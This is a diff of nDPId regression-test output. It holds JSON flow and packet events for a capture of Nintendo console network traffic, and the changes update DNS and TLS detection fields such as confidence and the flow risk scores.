{"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01361{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":97,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1500731326644,"flow_last_seen":1500731326731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":2908,"flow_avg_l4_payload_len":415,"midstream":0,"ts_msec":1500731326731,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","server_names":"*.baas.nintendo.com,baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=JP, ST=Kyoto, L=Minami-ku, O=Nintendo Co., Ltd., CN=*.baas.nintendo.com","fingerprint":"8A:0A:1D:D3:A8:96:7A:55:C5:75:B2:2B:3E:45:15:54:0A:B0:FC:94"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731329336,"flow_last_seen":1500731329336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1500731329336,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.146.242.74","src_port":11534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1500731329336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1500731329336,"pkt":"AA6OGXEMfLuKifuECABFAAAoEX5AAEAGM1vAqAxyNpLySi0OAbv6FA+Od8xLzVAQEsCrFwAA"}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1500731329520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1500731329520,"pkt":"fLuKifuEAA6OGXEMCABFAAAo9shAACwGYhA2kvJKwKgMcgG7LQ53zEvN+hQPj1AQn2AedgAA"}
@@ -54,80 +54,80 @@
 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1500731340946,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"ts_msec":1500731340946,"pkt":"AA6OGXEMfLuKifuECABFAABcEY4AAEARLg7AqAxyI55KPdprgjcASL\/4MquYZAEBAADlTwAACP0AEAAAAAAAZU1IBAAAAwAAAABOQVRUZXN0SWRfRHVtbXkAdr5X4NIRIiw3Gy5kQ0UkeA=="}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731340951,"flow_last_seen":1500731340951,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1500731340951,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1500731340951,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1500731340951,"pkt":"AA6OGXEMfLuKifuECABFAABOEY8AAEARz0zAqAxywKgMASfIADUAOkdJMLcBAAABAAAAAAAADWcyZGYzM2QwMS1scDEBcANzcnYIbmludGVuZG8DbmV0AAAcAAE="}
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731340951,"flow_last_seen":1500731340951,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1500731340951,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"g2df33d01-lp1.p.srv.nintendo.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731340951,"flow_last_seen":1500731340951,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1500731340951,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"g2df33d01-lp1.p.srv.nintendo.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1500731340951,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1500731340951,"pkt":"fLuKifuEAA6OGXEMCABFAABON9pAAEARaQHAqAwBwKgMcgA1J8gAOsbIMLeBgAABAAAAAAAADWcyZGYzM2QwMS1scDEBcANzcnYIbmludGVuZG8DbmV0AAAcAAE="}
-00764{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":141,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731340951,"flow_last_seen":1500731340951,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1500731340951,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"g2df33d01-lp1.p.srv.nintendo.net","num_queries":1,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":141,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731340951,"flow_last_seen":1500731340951,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1500731340951,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"g2df33d01-lp1.p.srv.nintendo.net","num_queries":1,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1500731340956,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1500731340956,"pkt":"AA6OGXEMfLuKifuECABFAABOEZAAAEARz0vAqAxywKgMASfIADUAOpTc4z4BAAABAAAAAAAADWcyZGYzM2QwMS1scDEBcANzcnYIbmludGVuZG8DbmV0AAABAAE="}
-00763{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":142,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1500731340951,"flow_last_seen":1500731340956,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1500731340956,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"g2df33d01-lp1.p.srv.nintendo.net","num_queries":1,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00769{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731340951,"flow_last_seen":1500731340956,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1500731340956,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"g2df33d01-lp1.p.srv.nintendo.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.10.205.177"}}
+00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":142,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1500731340951,"flow_last_seen":1500731340956,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1500731340956,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"g2df33d01-lp1.p.srv.nintendo.net","num_queries":1,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731340951,"flow_last_seen":1500731340956,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1500731340956,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"g2df33d01-lp1.p.srv.nintendo.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.10.205.177"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":148,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731340981,"flow_last_seen":1500731340981,"flow_idle_time":180000,"flow_min_l4_payload_len":256,"flow_max_l4_payload_len":256,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":256,"midstream":0,"ts_msec":1500731340981,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"52.10.205.177","src_port":55915,"dst_port":34343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00794{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1500731340981,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":298,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":298,"pkt_l4_len":264,"ts_msec":1500731340981,"pkt":"AA6OGXEMfLuKifuECABFAAEcEZMAAEARmWjAqAxyNArNsdprhicBCL5GMquYZAEAAADlcwAACAAA0AAAAAAAZU1IgACGJwAAAAAPAPz\/AL\/\/\/\/\/\/\/\/\/\/\/\/\/\/DNhnHrgUDeqh96EJudpqr7HTWmwuyiNXAoN8EJ3L9Q9lPi1doyYlmiR\/kIBcOYNG3f6ClDHLwoaKdMh+FYL2YCHItfujH2Z4qGo8CMfrSTput8A2wWQpgkAxBIJe0WvlOjtOpz1+6kpnOg7dok0TGK81\/aeKZUUCJvuan8vMhErLm0XKEN1cWoDxH\/OLKVz5pN4b+BSPCYy59gluv93Pq8HtsFMIvC\/lWp43XhLEF2IUu226gZ0swWlxHUEiaoKOkMwyqhQOw2nawlxv1+4u7w=="}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":151,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1500731341194,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1500731341194,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"ts_msec":1500731341194,"pkt":"AA6OGXEMfLuKifuECABFAABgEZUAAEARzzTAqAxywKgMAcdbADUATDXVYWkBAAABAAAAAAAAIGUwZDY3YzUwOWZiMjAzODU4ZWJjYjJmZTNmODhjMmFhBGJhYXMIbmludGVuZG8DY29tAAABAAE="}
-00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1500731341194,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1500731341194,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00752{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1500731341194,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"ts_msec":1500731341194,"pkt":"fLuKifuEAA6OGXEMCABFAAELN\/tAAEARaCPAqAwBwKgMcgA1x1sA9yl7YWmBgAABAAkAAAAAIGUwZDY3YzUwOWZiMjAzODU4ZWJjYjJmZTNmODhjMmFhBGJhYXMIbmludGVuZG8DY29tAAABAAHADAAFAAEAAAAPAB8OZDNmdGhwdnY3Znp4MDAKY2xvdWRmcm9udANuZXQAwFAAAQABAAAALQAENsAbCMBQAAEAAQAAAC0ABDbAG2jAUAABAAEAAAAtAAQ2wBuuwFAAAQABAAAALQAENsAbSsBQAAEAAQAAAC0ABDbAG1HAUAABAAEAAAAtAAQ2wBsnwFAAAQABAAAALQAENsAbxMBQAAEAAQAAAC0ABDbAG9k="}
-00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":152,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"ts_msec":1500731341194,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.192.27.8"}}
+00813{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":152,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"ts_msec":1500731341194,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.192.27.8"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731341201,"flow_last_seen":1500731341201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1500731341201,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1500731341201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1500731341201,"pkt":"AA6OGXEMfLuKifuECABFAAA8EZZAAEAGCkTAqAxyNsAbCHphAbtX9RrxAAAAAKACgAAP+wAAAgQFUAEDAwYEAggKABqqagAAAAA="}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1500731341241,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1500731341241,"pkt":"fLuKifuEAA6OGXEMCABFAAA8AABAAPUGZtk2wBsIwKgMcgG7emF9lpyBV\/Ua8qAScSBo2gAAAgQFrAQCCAqoOPNAABqqagEDAwg="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1500731341242,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1500731341242,"pkt":"AA6OGXEMfLuKifuECABFAAA0EZdAAEAGCkvAqAxyNsAbCHphAbtX9RryfZacgoAQAg4GiQAAAQEICgAaqpOoOPNA"}
-00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731341201,"flow_last_seen":1500731341246,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1500731341246,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":158,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1500731341201,"flow_last_seen":1500731341285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1500731341285,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-01255{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":159,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1500731341201,"flow_last_seen":1500731341285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":2908,"flow_avg_l4_payload_len":415,"midstream":0,"ts_msec":1500731341285,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","server_names":"*.baas.nintendo.com,baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=JP, ST=Kyoto, L=Minami-ku, O=Nintendo Co., Ltd., CN=*.baas.nintendo.com","fingerprint":"8A:0A:1D:D3:A8:96:7A:55:C5:75:B2:2B:3E:45:15:54:0A:B0:FC:94"}}
-00619{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":180,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1500731322454,"flow_last_seen":1500731342041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1500731342041,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1500731322454,"flow_last_seen":1500731342041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":68,"midstream":1,"ts_msec":1500731342041,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00987{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731341201,"flow_last_seen":1500731341246,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1500731341246,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
